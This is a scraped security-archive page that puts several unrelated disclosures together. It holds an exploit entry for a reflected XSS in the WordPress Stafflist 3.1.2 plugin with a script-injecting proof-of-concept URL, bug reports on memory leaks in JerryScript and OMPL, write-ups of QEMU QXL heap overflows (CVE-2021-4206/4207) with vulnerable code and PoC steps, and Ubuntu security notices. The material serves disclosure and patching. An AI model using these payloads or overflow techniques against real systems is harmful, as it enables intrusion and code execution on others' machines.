WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

JerryScript Git version 14ff5bf does not sufficiently track and release allocated memory via jerry-core/ecma/operations/ecma-regexp-object.c after RegExp, which causes a memory leak.

**JerryScript revision**

14ff5bf

**Build platform**

Ubuntu 20.04.3 LTS (Linux 5.11.0-34-generic x86\_64)

**Build steps**

./tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \\
--clean --debug --strip=off --logging=on --error-messages=on \\
--compile-flag=-fsanitize=address --stack-limit=20

**Test case**

function testAdvanceStringIndex(lastIndex) {
  let exec\_count \= 0;
  let last\_last\_index \= \-1;
  let fake\_re \= {
    exec: () \=> {
      return exec\_count++ \== 0 ? \[""\] : null;
    },

    get lastIndex() {
      return lastIndex;
    },

    set lastIndex(value) {
    },

    get global() {
      return true;
    }
  };

  RegExp.prototype\[Symbol.match\].call(fake\_re, "abc");
}

testAdvanceStringIndex(0x7ffffff);

**Output**

ICE: Assertion 'JERRY\_CONTEXT (jmem\_heap\_allocated\_size) == 0' failed at /jerryscript/jerry-core/jmem/jmem-heap.c(jmem\_heap\_finalize):107.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
Aborted (core dumped)

**Backtrace**

#0  \_\_GI\_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007f45b1399859 in \_\_GI\_abort () at abort.c:79
#2  0x00005574cdd6736f in jerry\_port\_fatal (code=ERR\_FAILED\_INTERNAL\_ASSERTION) at /jerryscript/jerry-port/default/default-fatal.c:30
#3  0x00005574cdcff841 in jerry\_fatal (code=ERR\_FAILED\_INTERNAL\_ASSERTION) at /jerryscript/jerry-core/jrt/jrt-fatals.c:63
#4  0x00005574cdcff897 in jerry\_assert\_fail (assertion=0x5574cdd73de8 "JERRY\_CONTEXT (jmem\_heap\_allocated\_size) == 0", file=0x5574cdd73d60 "/jerryscript/jerry-core/jmem/jmem-heap.c", function=0x5574cdd8bce0 <\_\_func\_\_.6665> "jmem\_heap\_finalize", line=107) at /jerryscript/jerry-core/jrt/jrt-fatals.c:87
#5  0x00005574cdcfe8a0 in jmem\_heap\_finalize () at /jerryscript/jerry-core/jmem/jmem-heap.c:107
#6  0x00005574cdcfe5d7 in jmem\_finalize () at /jerryscript/jerry-core/jmem/jmem-allocator.c:170
#7  0x00005574cdca9aaf in jerry\_cleanup () at /jerryscript/jerry-core/api/jerry.c:232
#8  0x00005574cdca73b4 in main (argc=2, argv=0x7ffffff6d468) at /jerryscript/jerry-main/main-jerry.c:371
#9  0x00007f45b139b0b3 in \_\_libc\_start\_main (main=0x5574cdca6889 <main>, argc=2, argv=0x7ffffff6d468, init=<optimized out>, fini=<optimized out>, rtld\_fini=<optimized out>, stack\_end=0x7ffffff6d458) at ../csu/libc-start.c:308
#10 0x00005574cdca67ce in \_start ()

**Expected behavior**

According to our analysis, the root cause of this assertion failed is at /jerryscript/jerry-core/ecma/ecma-regexp-object.c:3497. While getting next\_set\_status, function ecma-op-object-put() called function ecma\_make\_length\_value(index), which alloc a 8-bit chunk memory use as a float number if index is larger than 0x7ffffff. This chunk is not freed, causing assertion failed. To repair, ecma\_make\_length\_value(index) should be replaced by last\_index created by ecma-regexp-object.c:3496.

CVE-2021-41959: Unfreed float causing memory leak in ecma-regexp-object · Issue #4781 · jerryscript-project/jerryscript

OMPL v1.5.2 contains a memory leak in VFRRT.cpp

When I’m testing ompl, here is a memory leak occured. After positioning,we found that the error is caused by the following code in VFRRT.cpp:

In line 169.A motion object was requested with it’s constructor,and also new a state in that motion.but in line 170, the state in motion was assigned. The space applied in the constructor becomes a wild space.That’s why memory leaks.  
We suggest to use the default constructor in line 169.like that:  

I did my experiment on Ubuntu 16.04

CVE-2021-42218: A memory leak in VFRRT · Issue #839 · ompl/ompl

Ubuntu Security Notice 5382-2 - USN-5382-1 fixed a vulnerability in libinput. This update provides the corresponding updates for Ubuntu 22.04 LTS. Albin Eldstål-Ahrens and Lukas Lamster discovered libinput did not properly handle input devices with specially crafted names. A local attacker with physical access could use this to cause libinput to crash or expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5382-2  
May 02, 2022

libinput vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

libinput could be made to crash or expose sensitive information.

Software Description:  
- libinput: Input device management and event handling library

Details:

USN-5382-1 fixed a vulnerability in libinput. This update provides the  
corresponding updates for Ubuntu 22.04 LTS.

Original advisory details:

 Albin Eldstål-Ahrens and Lukas Lamster discovered libinput did not properly  
 handle input devices with specially crafted names. A local attacker with  
 physical access could use this to cause libinput to crash or expose  
 sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libinput10                      1.20.0-1ubuntu0.1

After a standard system update you need to log out of all desktop sessions  
and then log back in to make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5382-2  
  https://ubuntu.com/security/notices/USN-5382-1  
  CVE-2022-1215

Package Information:  
  https://launchpad.net/ubuntu/+source/libinput/1.20.0-1ubuntu0.1

Ubuntu Security Notice USN-5382-2

A flaw was found in the QXL display device emulation in QEMU. An integer overflow in the cursor_alloc() function can lead to the allocation of a small cursor object followed by a subsequent heap-based buffer overflow. This flaw allows a malicious privileged guest user to crash the QEMU process on the host or potentially execute arbitrary code within the context of the QEMU process.

**Description of the vulnerability****Technical Details**

QXL, the QEMU QXL video accelerator, is a para-virtualized framebuffer device for the SPICE protocol. It is the default video device when we create a VM from virt-manager. It exposes the RAMs and I/O ports to let guest communicate with it.

    00:01.0 VGA compatible controller: Red Hat, Inc. QXL paravirtual graphic card (rev 04) (prog-if 00 [VGA controller])
            Subsystem: Red Hat, Inc. QEMU Virtual Machine
            Flags: fast devsel, IRQ 21
            Memory at f4000000 (32-bit, non-prefetchable) [size=64M]
            Memory at f8000000 (32-bit, non-prefetchable) [size=64M]
            Memory at fcc14000 (32-bit, non-prefetchable) [size=8K]
            I/O ports at c040 [size=32]
            Expansion ROM at 000c0000 [disabled] [size=128K]
            Kernel driver in use: qxl
            Kernel modules: qxl
    

On its RAMs, QXL implements different rings for different purposes. The space cursor points to the device RAMs, which means the guest controls its content. In cursor_ring, the guest can push a cursor command to tell the video driver how to render a cursor or where to place the cursor. After we push a command and notify the device to handle the command, the function qxl_cursor will be called. It will use cursor->header.width and cursor->header.height to allocate enough space for forward use.

    static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
                                  uint32_t group_id)
    {
        QEMUCursor *c;
        uint8_t *and_mask, *xor_mask;
        size_t size;
    
        c = cursor_alloc(cursor->header.width, cursor->header.height);
        c->hot_x = cursor->header.hot_spot_x;
        c->hot_y = cursor->header.hot_spot_y;
        switch (cursor->header.type) {
    ...
    
        case SPICE_CURSOR_TYPE_ALPHA:
            size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
            qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
    
    

As I said before, the guest controls width and height when it enters the function cursor_alloc. The vulnerability happens in code \[1\]. if we set width and height to 0x8000. After the multiplication, it causes integer overflow and makes datasize become zero. the following allocation will not give enough space buffer.

    QEMUCursor *cursor_alloc(int width, int height)
    {
        QEMUCursor *c;
        int datasize = width * height * sizeof(uint32_t); //code [1]
    
        c = g_malloc0(sizeof(QEMUCursor) + datasize);
        c->width  = width;
        c->height = height;
        c->refcount = 1;
        return c;
    }
    

In function qxl_unpack_chunks, wrong allocation at cursor_alloc cause it believes buffer dest has size space for store data. Return from cursor\_alloc, and it recalculates size with type size_t, so it will multiply the correct value and enter function qxl_unpack_chunks for store guest data. Later calling memcpy will cause heap overflow.

    static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
                                  QXLDataChunk *chunk, uint32_t group_id)
    {
        uint32_t max_chunks = 32;
        size_t offset = 0;
        size_t bytes;
    
        for (;;) {
            bytes = MIN(size - offset, chunk->data_size);
            memcpy(dest + offset, chunk->data, bytes);
            offset += bytes;
            if (offset == size) {
                return;
            }
            chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
            if (!chunk) {
                return;
            }
            max_chunks--;
            if (max_chunks == 0) {
                return;
            }
        }
    }
    

**Requirement**

*   The attacker needs to run as a high-privileged user
*   VM need a QXL Video Device and a VNC Server Graphics

**Proof Of Concept**

Use virt-manager to create a VM which has a QXL Video Device and a VNC Server Graphics

*   Host OS : Ubuntu
    
*   Guest OS : Ubuntu
    
*   Run gcc poc.c -o poc and sudo ./poc
    
*   The VM will crash
    

**Mitigations**

*   Since the PoC must be run at high-privileged on the guest OS, Do not run untrusted code or driver in guest OS.

**Timeline**

*   2021-12-28 Vendor disclosure
*   2022-03-28 Vendor patched

**Credit**

Discovered by Billy Jheng Bing Jhong (@st424204)

CVE-2021-4206: QEMU QXL Integer overflow leads to Heap Overflow

A flaw was found in the QXL display device emulation in QEMU. A double fetch of guest controlled values `cursor->header.width` and `cursor->header.height` can lead to the allocation of a small cursor object followed by a subsequent heap-based buffer overflow. A malicious privileged guest user could use this flaw to crash the QEMU process on the host or potentially execute arbitrary code within the context of the QEMU process.

**Description of the vulnerability****Technical Details**

QXL, the QEMU QXL video accelerator, is a para-virtualized framebuffer device for the SPICE protocol. It is the default video device when we create a VM from virt-manager. It exposes the RAMs and I/O ports to let guest communicate with it.

    00:01.0 VGA compatible controller: Red Hat, Inc. QXL paravirtual graphic card (rev 04) (prog-if 00 [VGA controller])
            Subsystem: Red Hat, Inc. QEMU Virtual Machine
            Flags: fast devsel, IRQ 21
            Memory at f4000000 (32-bit, non-prefetchable) [size=64M]
            Memory at f8000000 (32-bit, non-prefetchable) [size=64M]
            Memory at fcc14000 (32-bit, non-prefetchable) [size=8K]
            I/O ports at c040 [size=32]
            Expansion ROM at 000c0000 [disabled] [size=128K]
            Kernel driver in use: qxl
            Kernel modules: qxl
    

On its RAMs, QXL implements different rings for different purposes. The space cursor points are device RAMs, which means the guest controls its content. In cursor_ring, the guest can push a cursor command to tell the video driver how to render a cursor or where to place the cursor. After we push a command and notify the device to handle the command, the function qxl_cursor will be called. It will fetch cursor->header.width and cursor->header.height to allocate enough space for forward use.

    static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
                                  uint32_t group_id)
    {
        QEMUCursor *c;
        uint8_t *and_mask, *xor_mask;
        size_t size;
    
        c = cursor_alloc(cursor->header.width, cursor->header.height);
        c->hot_x = cursor->header.hot_spot_x;
        c->hot_y = cursor->header.hot_spot_y;
        switch (cursor->header.type) {
    ...
    
        case SPICE_CURSOR_TYPE_ALPHA:
            size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
            qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
    
    

Return from cursor_alloc and it fetches cursor->header.width and cursor->header.height again to calculate size. Because cursor points to RAMS which means the cursor->header.width and cursor->header.height can be modify by guest anytime, we can race it to make them be a larger value after return from cursor_alloc. In function qxl_unpack_chunks, due to the wrong size causing it to believe buffer dest has size space for store data. Later calling memcpy will cause heap overflow.

    static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
                                  QXLDataChunk *chunk, uint32_t group_id)
    {
        uint32_t max_chunks = 32;
        size_t offset = 0;
        size_t bytes;
    
        for (;;) {
            bytes = MIN(size - offset, chunk->data_size);
            memcpy(dest + offset, chunk->data, bytes);
            offset += bytes;
            if (offset == size) {
                return;
            }
            chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
            if (!chunk) {
                return;
            }
            max_chunks--;
            if (max_chunks == 0) {
                return;
            }
        }
    }
    

**Requirement**

*   The attacker needs to run as a high-privileged user
*   VM need a QXL Video Device and a VNC Server Graphics

**Proof Of Concept**

Use virt-manager to create a VM which has a QXL Video Device and a VNC Server Graphics

*   Host OS : Ubuntu
    
*   Guest OS : Ubuntu
    
*   Run gcc poc.c -pthread -o poc and sudo ./poc
    
*   The VM will crash
    

**Mitigations**

*   Since the PoC must be run at high-privileged on the guest OS, Do not run untrusted code or driver in guest OS.

**Timeline**

*   2021-12-28 Vendor disclosure
*   2022-03-28 Vendor patched

**Credit**

Discovered by Billy Jheng Bing Jhong (@st424204)

CVE-2021-4207: QEMU QXL Integer overflow leads to Heap Overflow

Ubuntu Security Notice 5398-1 - It was discovered that SDL incorrectly handled certain files. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5398-1  
April 28, 2022

libsdl1.2, libsdl2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 21.10  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

SDL (Simple DirectMedia Layer) could be made to crash or run programs if  
it opened a specially crafted file.

Software Description:  
- libsdl2: Cross-platform multimedia library with low access to hardware  
- libsdl1.2: Simple DirectMedia Layer

Details:

It was discovered that SDL (Simple DirectMedia Layer) incorrectly handled  
certain files. An attacker could possibly use this issue to cause a denial  
of service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 21.10:  
   libsdl2-2.0-0                   2.0.14+dfsg2-3ubuntu0.1

Ubuntu 18.04 LTS:  
   libsdl1.2debian                 1.2.15+dfsg2-0.1ubuntu0.2

Ubuntu 16.04 ESM:  
   libsdl1.2debian                 1.2.15+dfsg1-3ubuntu0.1+esm1

Ubuntu 14.04 ESM:  
   libsdl1.2debian                 1.2.15-8ubuntu1.1+esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5398-1  
   CVE-2021-33657

Package Information:  
   https://launchpad.net/ubuntu/+source/libsdl2/2.0.14+dfsg2-3ubuntu0.1  
   https://launchpad.net/ubuntu/+source/libsdl1.2/1.2.15+dfsg2-0.1ubuntu0.2

Ubuntu Security Notice USN-5398-1

Ubuntu Security Notice 5397-1 - Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2. An attacker could possibly use this issue to access sensitive information. Harry Sintonen discovered that curl incorrectly handled certain requests. An attacker could possibly use this issue to expose sensitive information.

    =========================================================================Ubuntu Security Notice USN-5397-1April 28, 2022curl vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 21.10- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in curl.Software Description:- curl: HTTP, HTTPS, and FTP client and client librariesDetails:Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2.An attacker could possibly use this issue to access sensitive information.(CVE-2022-22576)Harry Sintonen discovered that curl incorrectly handled certain requests.An attacker could possibly use this issue to expose sensitive information.(CVE-2022-27774, CVE-2022-27775, CVE-2022-27776)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  curl                            7.81.0-1ubuntu1.1  libcurl3-gnutls                 7.81.0-1ubuntu1.1  libcurl3-nss                    7.81.0-1ubuntu1.1  libcurl4                        7.81.0-1ubuntu1.1Ubuntu 21.10:  curl                            7.74.0-1.3ubuntu2.1  libcurl3-gnutls                 7.74.0-1.3ubuntu2.1  libcurl3-nss                    7.74.0-1.3ubuntu2.1  libcurl4                        7.74.0-1.3ubuntu2.1Ubuntu 20.04 LTS:  curl                            7.68.0-1ubuntu2.10  libcurl3-gnutls                 7.68.0-1ubuntu2.10  libcurl3-nss                    7.68.0-1ubuntu2.10  libcurl4                        7.68.0-1ubuntu2.10Ubuntu 18.04 LTS:  curl                            7.58.0-2ubuntu3.17  libcurl3-gnutls                 7.58.0-2ubuntu3.17  libcurl3-nss                    7.58.0-2ubuntu3.17  libcurl4                        7.58.0-2ubuntu3.17In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5397-1  CVE-2022-22576, CVE-2022-27774, CVE-2022-27775, CVE-2022-27776Package Information:  https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.1  https://launchpad.net/ubuntu/+source/curl/7.74.0-1.3ubuntu2.1  https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.10  https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.17

Ubuntu Security Notice USN-5397-1

Ubuntu Security Notice 5396-1 - It was discovered that Ghostscript incorrectly handled certain PostScript files. If a user or automated system were tricked into processing a specially crafted file, a remote attacker could possibly use this issue to access arbitrary files, execute arbitrary code, or cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5396-1April 28, 2022ghostscript vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Ghostscript could be made to crash, access files, or run programs if itopened a specially crafted file.Software Description:- ghostscript: PostScript and PDF interpreterDetails:It was discovered that Ghostscript incorrectly handled certain PostScriptfiles. If a user or automated system were tricked into processing aspecially crafted file, a remote attacker could possibly use this issue toaccess arbitrary files, execute arbitrary code, or cause a denial ofservice.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:  ghostscript                     9.26~dfsg+0-0ubuntu0.18.04.16  libgs9                          9.26~dfsg+0-0ubuntu0.18.04.16In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5396-1  CVE-2019-25059Package Information:  https://launchpad.net/ubuntu/+source/ghostscript/9.26~dfsg+0-0ubuntu0.18.04.16

Ubuntu Security Notice USN-5396-1

Ubuntu Security Notice 5395-1 - It was discovered that networkd-dispatcher incorrectly handled internal scripts. A local attacker could possibly use this issue to cause a race condition, escalate privileges and execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5395-1  
April 28, 2022

networkd-dispatcher vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in networkd-dispatcher.

Software Description:  
- networkd-dispatcher: Dispatcher service for systemd-networkd   
connection status changes

Details:

It was discovered that networkd-dispatcher incorrectly handled internal  
scripts. A local attacker could possibly use this issue to cause a race  
condition, escalate privileges and execute arbitrary code.  
(CVE-2022-29799, CVE-2022-29800)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   networkd-dispatcher             2.1-2ubuntu0.22.04.1

Ubuntu 21.10:  
   networkd-dispatcher             2.1-2ubuntu0.21.10.1

Ubuntu 20.04 LTS:  
   networkd-dispatcher             2.1-2~ubuntu20.04.2

Ubuntu 18.04 LTS:  
   networkd-dispatcher             1.7-0ubuntu3.4

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5395-1  
   CVE-2022-29799, CVE-2022-29800

Package Information:

 https://launchpad.net/ubuntu/+source/networkd-dispatcher/2.1-2ubuntu0.22.04.1

 https://launchpad.net/ubuntu/+source/networkd-dispatcher/2.1-2ubuntu0.21.10.1

 https://launchpad.net/ubuntu/+source/networkd-dispatcher/2.1-2~ubuntu20.04.2  
   https://launchpad.net/ubuntu/+source/networkd-dispatcher/1.7-0ubuntu3.4

Tag

#ubuntu